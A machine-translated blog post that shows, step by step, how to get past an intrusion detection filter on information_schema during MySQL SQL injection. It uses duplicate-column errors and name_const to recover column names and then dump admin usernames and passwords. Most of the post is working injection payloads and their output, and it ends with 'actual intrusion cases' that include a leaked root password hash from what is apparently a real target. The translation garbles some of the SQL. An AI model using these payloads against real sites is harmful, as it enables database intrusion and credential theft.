Attackers can bypass IDS to filter information_schema and continue the injection.

Original article: bypassing ids to filter information_schema continuous perfusion

 
// Use mysql to expose fields with errors
 
Mysql select * from (select * from user ajoin user B) c;
 
Error 1060 (42s21): duplicate column namehost
 
Mysql select * from (select * from user ajoin user busing (host) c;
 
Error 1060 (42s21): duplicate column nameuser
 
Mysql select * from (select * from user ajoin user busing (host, user) c;
 
Error 1060 (42s21): duplicate column namepassword
 
.
 
// Obtain information
 
// It may be a version problem. I cannot test it successfully.
 
Mysql select name_const (select host from user limit 0, 1), 0 );
 
Error 1210 (hy000): incorrect arguments to name_const
 
It seems that the name_const parameter must be the same as the const parameter.
 
Try again next time.
 
Update: it is clearly a version problem (the parameters in the higher version are all const, or an error is reported). the versatility of this method does not seem very good.
 
Mysql select version ();
 
+ --- +
 
| Version () |
 
+ --- +
 
| 5.0.27-community-nt |
 
+ --- +
 
1 row in set (0.00 sec)
 
Mysql select name_const (select user (), 0 );
 
+ -- +
 
| Root @ localhost |
 
+ -- +
 
| 0 |
 
+ -- +
 
1 row in set (0.00 sec)
 
---
 
Mysql select version ();
 
+ -- +
 
| Version () |
 
+ -- +
 
| 5.1.35-community |
 
+ -- +
 
1 row in set (0.00 sec)
 
Mysql select name_const (select version (), 0 );
 
Error 1210 (hy000): incorrect arguments to name_const
 
When I was doing penetration, I met a website where ids filtered information_schema. As a result, I failed to solve the problem later. I read the article the day before and found a bypass method. I tested it locally, I also discussed the monthly meeting, and finally constructed the statements with the help of the monthly meeting. At that point, I went back and looked at them, later, when my brother released the method, let's publish it.
 
1. Construct a local test table
 
Mysql create table users (id int, name varchar (20), passwd varchar (32 ));
 
Query OK, 0 rows affected (0.04 sec)
 
Mysql insert into users value (1, mickey, 827ccb0eea8a706c4c34a16891f84e7b );
 
Query OK, 1 row affected (0.00 sec)
 
Mysql create table news (is_admin int (1), id int (2), title varchar (100), date );
 
Query OK, 0 rows affected (0.00 sec)
 
Mysql insert into news values (1, 1, hello, mickey, now ());
 
Query OK, 1 row affected, 1 warning (0.00 sec)
 
2. Violent column names
 
Mysql select * from (select * from users as ajoin news as B) as c;
 
Error 1060 (42s21): duplicate column nameid
 
Mysql select * from (select * from users ajoin users busing (id) c;
 
Error 1060 (42s21): duplicate column namename
 
Mysql select * from (select * from users ajoin users busing (id, name) c;
 
Error 1060 (42s21): duplicate column namepasswd
 
Mysql select * from (select * from users ajoin users busing (id, name, passwd) c;
 
+ -- + --- + ---- +
 
| Id | name | passwd |
 
+ -- + --- + ---- +
 
| 1 | mickey | 827ccb0eea8a706c4c34a16891f84e7b |
 
+ -- + --- + ---- +
 
1 row in set (0.00 sec)
 
Mysql select * from (select * from news ajoin news busing (id) as c;
 
Error 1060 (42s21): duplicate column nameis_admin
 
Mysql select * from (select * from news ajoin news busing (id, is_admin) as c;
 
Error 1060 (42s21): duplicate column nametitle
 
Mysql select * from (select * from news ajoin news busing (id, is_admin, title) as c;
 
Error 1060 (42s21): duplicate column namedate
 
Mysql select * from (select * from news ajoin news busing (id, is_admin, title, date) as c;
 
+ ---- + -- + --- + -- +
 
| Is_admin | id | title | date |
 
+ ---- + -- + --- + -- +
 
| 1 | 1 | hello, mickey | 2010-05-08 |
 
+ ---- + -- + --- + -- +
 
1 row in set (0.00 sec)
 
3. brute force field value (this statement was created by yuanniu)
 
Violent statements
 
Select * from cms_votes where vid = 1 and exists
(Select * from (select name_const (select group_concat (concat (uid, 0x7c, pwd) from admin)
 
, Fuck) a join (select name_const (select group_concat (concat (uid, 0x7c, pwd) from admin), fuck) B) c );
 
Application:
 
Mysql select * from cms_votes where vid = 1 and exists
 
(Select * from (select name_const (
 
(Select group_concat (concat (uid, 0x7c, pwd) from admin), fuck) a join (select name_const (select group_concat (concat (uid, 0x7c, pwd )) fromadmin ),
 
Fuck) B) c );
 
Error 1060 (42s21): duplicate column nameylbhz | fuck, mickey | fucked
 
Mysql select * from cms_votes where vid = 1 and exists
 
(Select * from (select name_const (@ version, 0 ))
 
A join (select name_const (@ version, 0) B) c );
 
Error 1060 (42s21): duplicate column name5.0.45-community-nt
 
4. Actual intrusion Cases
 
Column name5.0.27-community-nterror: duplicate column name5.0.27-community-nt
 
Column nameroot * b7b1a4f45d9e638faeb750f0a 99935634cff6c82 ′
 
Error: duplicate column nameroot * b7b1a4f45d9e638faeb750f0a 99935634cff6c82 ′
 
Finally, I would like to thank Mo NIU for guiding the participants.